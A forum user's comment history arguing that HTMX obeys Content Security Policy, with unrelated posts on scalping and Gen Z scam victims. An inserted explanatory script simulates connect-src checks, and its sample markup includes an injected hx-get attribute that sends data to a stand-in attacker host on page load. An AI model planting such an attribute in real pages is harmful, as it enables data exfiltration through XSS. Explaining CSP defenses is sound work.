Posts
0
Comments
189
Joined
2 yr. ago

  • Literally almost spit out my iced latte this am watching.

    Somehow, irrespective of indicating any kind of actual political ideology, this is the most liberal comment I have ever read on the internet.

  • picture of handwritten note taped to a window that criticizes Gen Z and praises Baby Boomers.

    I'm not the brightest cookie in the toolshed but I know bait when I see it.

    Edit: The top left hand corner of this is also dated 4/20. As the Brits would say "Someone's taking the piss."

  • Oh boy a semantic argument

    It turns out the language you use can be semantically ambiguous or misleading if you phrase it incorrectly. Today you learned.

    And any web dev who remotely understands the point of CSP and why it was created, should instantly have alarm bells going off at the concept of triggering arbitrary ajax via html attributes.

    Oh, did you finally manage to fucking Google how HTMX works so you could fish for more reasons to say it's unsafe? What you're describing is not a particular concern to HTMX. If an attacker can inject HTML into your page (for example, through an XSS vulnerability), they could potentially set up HTMX attributes to make requests to any endpoint, including endpoints designed to collect sensitive information. But, and this is very important, this is not a unique issue to HTMX; it's a general security concern related to XSS vulnerabilities and improper CSP configurations.

    Do you know what the correct cure for that is?

    PROPER CSP CONFIGURATION.

    “HTMX doesn’t bypass CSP! It just (proceeds to describe the exact mechanism by which it bypasses CSP)”

    Do you genuinely not understand that CSP works on the browser API level? It doesn't check to see if your JavaScript contains reference to disallowed endpoints and then prevents it from running. I don't know how you "think" CSP operates, but what happens is this: The browser exposes an API to allow JavaScript to make HTTP requests - specifically XMLHttpRequest and fetch(). What CSP does is tell the browser "Hey, if you get an API request via XMLHttpRequest or fetch to a disallowed endpoint, don't fucking issue it." That's it. HTMX does not magically bypass the underlying CSP mechanism, because those directives operate on a level beyond HTMX's (or any JS library's) influence BY DESIGN. You cannot bypass it if it's properly configured. Two very serious questions: what part of this is confusing to you? And, have you ever tested this yourself in any capacity to even see if what you're claiming is even true? Because I have tested it and CSP will block ANY HTMX issued request that is not allowed by CSP's connect-src directive, assuming that's set.

  • Just to be clear, are you talking about some kind of templating library that literally transpiles all the htmx logic and instead packs it into individual ajax logic in js files “per element”, such that you don’t need to serve htmx client side and instead you pre-transpile all the ajax logic out to separate files?

    My brother in Christ, what the fuck are you talking about "transpiling HTMX" and "serving HTMX client side?" You don't "serve" HTMX and there's nothing to "transpile into JavaScript." It is JavaScript. That's like saying you "serve React client side" and "transpile JavaScript into more JavaScript." Jesus, I feel like I'm taking crazy pills.

    Cause the very start of my statements was that if we had something like that then HTMX would be fine, as a templating lib that transpiled out to html+js.

    Oh, okay, so you don't actually know what HTMX is or how it works, then? Because HTMX (https://htmx.org/) is a JavaScript library. Like, literally just a JavaScript library. It's like....4000 lines of JavaScript. In fact you can read the source code for it here: https://github.com/bigskysoftware/htmx/blob/master/src/htmx.js. For some...insane reason you seem to think HTMX is its own language. It's not. It's...just a JavaScript library. There is no other language called HTMX. There is no other mechanism or tool called HTMX. No implementation or protocol or ANYTHING else. It's just a small JavaScript library.

    invoke arbitrary logic with html attributes

    Once again, HTMX enhances HTML with various attributes declaratively. It utilizes custom data attributes in HTML (like hx-get, hx-post) to specify how elements on the page should behave - essentially, how and where to fetch data or submit forms without a full page reload. This is a form of declarative programming that tells the htmx.js library (which is just doing fucking AJAX) what to do when certain events occur (e.g., a click or a form submission). The actions (like the actual requesting of data from an endpoint) are performed by the code in htmx.js.

    This is a fancy way of saying "if you stick an hx-get attribute on a button, then you can just say where you want a GET request to go to and what element you want updated with the HTML returned from it and htmx.js will parse that out on page load and set an event listener for the button click to know when to initiate an AJAX request to the defined endpoint." If you had an hx-get attribute in an element in a page and that page didn't have the htmx.js library loaded it would do literally nothing.

    And, once again, HTMX, being a JavaScript library, operates under the same security constraints as any JavaScript executed in the browser. This means that:

    1. HTMX's scripts themselves must be loaded from sources allowed by the script-src CSP directive.
    2. Any dynamic requests to load content or submit data initiated by HTMX are subject to CSP's connect-src directive.

  • HTMX enables arbitrary invocation of ANY api endpoint with cookies included, through html attributes, which inherently can’t be covered by Content Security Policy

    I want you to please explain how HTMX bypasses the Content Security Policy connect-src directive, or any -src directive, for that matter, assuming it is specified (which it should be). Because I'm genuinely curious why the HTMX dev team would include a section on CSP in their docs if it did literally nothing, as you say.

    Actually, as an even more basic question...you do know that HTMX is literally just an AJAX library, right? It doesn't actually "do" anything via HTML attributes. The additional HTMX attributes, like hx-get, hx-post, etc. just tell HTMX where and how to make the API requests. These requests are executed by the browser's native fetch or XMLHttpRequest APIs, depending on compatibility and implementation. Therefore, HTMX is subject to the same security constraints and policies as any other JavaScript-based operation that makes HTTP requests. Which also, by definition, means that it adheres to the Content Security Policy directives configured for that website.

    In other words, an HTML button element with hx-get="https://www.some-endpoint.com/" on it would eventually translate into

    // what htmx.js runs when the button is clicked
    const xhr = new XMLHttpRequest();
    xhr.open("GET", "https://www.some-endpoint.com/");
    xhr.send();

    on click.

    You do understand that, right?
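    As an added example (not code from this thread, from htmx, or from any browser), the script below models the distinction drawn in this comment and in the CSP comment further up: an hx-* attribute only names an endpoint, and it is the browser's connect-src enforcement, not the library, that decides whether the resulting XMLHttpRequest or fetch ever leaves the page (while script-src only governs whether htmx.js itself may load). The page origin app.example, the attacker.invalid host, the sample markup and both policy strings are constructed; the matcher is a simplified version of the CSP source-expression algorithm, not a browser's implementation.

```javascript
// Added example, not code from the thread or from the htmx project.
// A simplified model of how a browser applies the CSP connect-src directive
// to the XMLHttpRequest/fetch calls that htmx issues for hx-* attributes.
// Real browsers implement the full CSP Level 3 matching algorithm; this covers
// 'self', 'none', '*', scheme sources, wildcard subdomains, ports and paths.

const PAGE_ORIGIN = "https://app.example"; // constructed sample page origin

// Parse a CSP header value into { directiveName: [sourceExpression, ...] }.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name) policy[name.toLowerCase()] = sources;
  }
  return policy;
}

// Default port for the two schemes this toy cares about.
function defaultPort(protocol) {
  return protocol === "https:" ? "443" : "80";
}

// Does one source expression permit a request to `target` (a URL object)?
function sourceMatches(source, target, pageOrigin) {
  const src = source.trim();
  const keyword = src.toLowerCase();
  if (keyword === "'none'") return false;
  if (keyword === "'self'") return target.origin === pageOrigin;
  if (keyword === "*") return true;            // spec also excludes data:/blob:; ignored here
  if (keyword.startsWith("'")) return false;   // 'unsafe-inline', nonces etc. never match a URL
  if (/^[a-z][a-z0-9+.-]*:$/i.test(src)) return target.protocol === keyword; // scheme-source, e.g. https:
  // host-source: [scheme://]host[:port][/path]
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)(?::(\d+|\*))?(\/.*)?$/i.exec(src);
  if (!m) return false;
  const scheme = m[1] && m[1].toLowerCase();
  const host = m[2].toLowerCase();
  const port = m[3];
  const path = m[4];
  if (scheme) {
    if (target.protocol !== scheme + ":") return false;
  } else {
    // no scheme in the source: must match the page's scheme (https is always acceptable)
    const pageScheme = new URL(pageOrigin).protocol;
    if (target.protocol !== pageScheme && target.protocol !== "https:") return false;
  }
  if (host.startsWith("*.")) {
    // "*.app.example" matches subdomains only, never the apex host itself
    if (!target.hostname.endsWith(host.slice(1))) return false;
  } else if (target.hostname !== host) {
    return false;
  }
  if (port === undefined) {
    if (target.port !== "") return false;      // no port in the source: only the default port matches
  } else if (port !== "*" && (target.port || defaultPort(target.protocol)) !== port) {
    return false;
  }
  if (path) {
    const ok = path.endsWith("/") ? target.pathname.startsWith(path) : target.pathname === path;
    if (!ok) return false;
  }
  return true;
}

// Decide whether connect-src (falling back to default-src) lets this request out.
// With neither directive present the browser imposes no restriction at all.
function connectAllowed(policy, url, pageOrigin = PAGE_ORIGIN) {
  const sources = policy["connect-src"] ?? policy["default-src"];
  if (sources === undefined) return true;
  const target = new URL(url, pageOrigin);
  return sources.some((s) => sourceMatches(s, target, pageOrigin));
}

// Toy scan of markup for the endpoints htmx would request (htmx itself walks the DOM).
function extractHxEndpoints(html) {
  const found = [];
  const re = /\bhx-(get|post|put|patch|delete)\s*=\s*"([^"]*)"/gi;
  for (let m; (m = re.exec(html)) !== null; ) found.push({ method: m[1].toUpperCase(), url: m[2] });
  return found;
}

// For each hx-* endpoint, would the browser's CSP enforcement let the XHR leave?
function evaluatePage(html, cspHeader, pageOrigin = PAGE_ORIGIN) {
  const policy = parseCsp(cspHeader);
  return extractHxEndpoints(html).map(({ method, url }) => ({
    method, url, allowed: connectAllowed(policy, url, pageOrigin),
  }));
}

// Constructed sample markup: two legitimate elements plus an attribute an XSS
// could have injected to ship data to an attacker-controlled host.
const SAMPLE_HTML = `
<button hx-get="/api/profile" hx-target="#card">Load profile</button>
<button hx-post="https://api.app.example/orders" hx-target="#list">Orders</button>
<div hx-get="https://collector.attacker.invalid/leak?c=1" hx-trigger="load"></div>
`;

// Policy that restricts script loading but says nothing about connections:
// script-src alone does not constrain where already-loaded JS may send requests.
const SCRIPT_ONLY_CSP = "script-src 'self'";
// Policy with an explicit connect-src allow-list (constructed).
const STRICT_CSP = "default-src 'self'; script-src 'self'; connect-src 'self' https://*.app.example";

console.log("script-src only:", evaluatePage(SAMPLE_HTML, SCRIPT_ONLY_CSP));
console.log("with connect-src:", evaluatePage(SAMPLE_HTML, STRICT_CSP));
```

    Run with `node` to see the two tables: under the script-src-only policy all three requests are allowed, including the injected one; under the policy with connect-src the same injected attribute is blocked while the two legitimate endpoints still pass. The library that parsed the attribute never enters the decision.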

  • I'm actually a huge fan of scalping and hope it happens more. Here's why: many of your more dim-witted, more or less middle-class "free market" bros will gladly tell you that the value of a good is set by supply and demand. Hospital care is so expensive because there are comparatively few doctors, MRI machines, etc. in comparison with the entire population. Houses are so expensive because everyone wants a house and it's an appreciable asset. I've seen these people my entire life. They'll decry socialism and make the age old joke that "socialism is when no potato." But the second a PS5 gets a street price of 700 bucks, suddenly they become walking "Homer Simpson fading into the hedge and coming back out wearing a different outfit" memes. They'll say things like "scalping should be illegal" or "the government should step in to make sure that the actual consumers who want one can get one - nobody should be allowed to buy 500 of them and just sit on them forever." Suddenly, market economics produces a state of inequality that doesn't directly benefit them, and the guiding hand of the government should be used to ensure equitable distribution of resources. Not that they'd ever reflect on this in any way or consider how their personal experiences indicate a larger set of structural problems with the economic systems that produce such a state of affairs.

  • You can say the title is clickbait, but that doesn't make it sensationalist. I feel like either you and I have totally different definitions of sensationalist, or you think the article is doing something it's not. The article does the following

    1. Introduces a surprising fact: Zoomers fall for online scams more than Boomers do. This is surprising because a) Zoomers are online so much and would be expected to be innately familiar with such things and b) online scammers famously target the elderly, so much so that Boomers are almost stereotyped as being the victims of internet scams.
    2. Adds supporting details and discusses the source of the facts being discussed - specifically it introduces the Deloitte study, a 2023 report by Social Catfish, and the academic article I linked in my previous comment. These all help provide the concrete, factual basis for the article.
    3. Highlights important findings from these sources that explain this phenomenon, including the centrality of mobile devices to the lives of Zoomers, how many popular apps have no real safeguards against predatory users or advertisers, and cultural or societal trends that might influence how Zoomers perceive their interactions with others on the internet.
    4. Discusses how Zoomers can better protect themselves online and how, one can infer from the article, an adult or guardian could help Zoomers stay safe on the internet - such as by enabling safer settings or utilizing alternative browsers and ad blockers (things Zoomers might not innately think to do or know about), while also addressing some of the failures of large corporations and app developers to safeguard their users.

    I'd like to know what part of that is sensationalist to you, because in my mind that is a remarkably by the numbers tech article.

    Also, the data itself is not "BS" - it's something that is accurate, but has to be understood within a specific context. That's literally what the article is doing - contextualizing the information. You are saying it's sensationalizing the data. It's not. If anything it's doing the opposite. It's making the data more mundane by providing logical explanations for it.

  • I know people who teach high school and they say that Gen Z has both an extreme degree of personal esteem and that they won't take shit from anyone who disparages who they fundamentally are as people (like people giving shit for them being from immigrant families, being POCs, being LGBT, etc.), which is fantastic - no one should ever put up with shit like that. But they also seem to have a very hard time organizing their thoughts and making logical conclusions from structured evidence. Like they can't write a paper making an argument for something and providing evidence for why something is a certain way. It's all stream of consciousness. I think that as a generational cohort they might be more inclined towards "unstructured thought" or perhaps "stream of consciousness" than other generations. As old as I might sound because of this opinion, I do think that the fact that they interact with information almost entirely through mobile devices is a potential component of that. The mechanisms and mediums by which you consume information arguably shape how you process information.

  • So you agree the article is sensationalist?

    The article is not sensationalist. Please quote me a part of the article that you feel is and I can address the statements that make you feel that way.

    Why link me a study that is irrelevant for no reason?

    Because that study is referenced as one of the primary sources the article uses to provide evidence for the phenomenon it discusses. The link to that research paper is literally in the article. It's critical to the article.

  • Yes, they acknowledge that as well when they discuss the sample population. Baby Boomers are literally not a part of it. The title of the Vox article is just drawn from a Deloitte industry survey. Which has no real context or judgment around it - it's purely a reporting of aggregate statistics. The Vox article just attempts to explain why Zoomers, a generational cohort that grew up with the internet, might be more statistically prevalent for succumbing to those scams compared to Baby Boomers, who were fully adult when the internet became widespread. The superficial presumption is that you would expect the opposite - the older generations have little to no familiarity with modern technology and are more easily victimized by it. That presumption is all the Vox article is discussing, really, and why it's probably not correct.